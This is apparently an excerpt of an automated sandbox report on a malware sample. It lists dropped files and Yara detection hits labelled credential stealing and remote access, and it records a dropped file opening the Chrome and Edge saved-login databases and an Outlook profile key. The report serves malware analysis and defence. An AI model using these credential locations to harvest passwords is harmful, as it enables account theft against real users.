                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C9194 GetLocalTime,4_2_027C9194
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027CB714 GetVersionExA,4_2_027CB714
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640f08.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b4e5e.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ebd3d90.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de54e5e.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ebd3d90.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de53f56.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb95570.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f0a3d90.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d813f56.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f065570.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb96478.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a86478.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ffd0000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de53f56.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b3f56.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb96478.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f066478.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d813f56.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00f08.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.28640000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26ac3d90.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f0a3d90.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d814e5e.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b3f56.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0f08.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30c70000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30c70000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de54e5e.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.3.rpkhzpuO.pif.23be07b8.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a85570.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb95570.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f065570.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b4e5e.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d814e5e.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640f08.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0f08.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ffd0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f066478.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a86478.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a85570.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2145721948.0000000028640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2351518623.000000001FFD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2391691150.0000000030C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000002.3277651726.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640f08.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b4e5e.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ebd3d90.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de54e5e.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ebd3d90.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de53f56.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb95570.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f0a3d90.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d813f56.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f065570.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb96478.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a86478.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ffd0000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de53f56.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b3f56.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb96478.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f066478.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d813f56.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00f08.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.28640000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26ac3d90.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f0a3d90.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d814e5e.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b3f56.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0f08.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.27f00000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30c70000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30c70000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2de54e5e.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.3.rpkhzpuO.pif.23be07b8.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a85570.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1eb95570.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f065570.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.257b4e5e.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1d814e5e.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.30640f08.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.200d0f08.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rpkhzpuO.pif.1ffd0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.rpkhzpuO.pif.2f066478.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a86478.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.rpkhzpuO.pif.26a85570.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
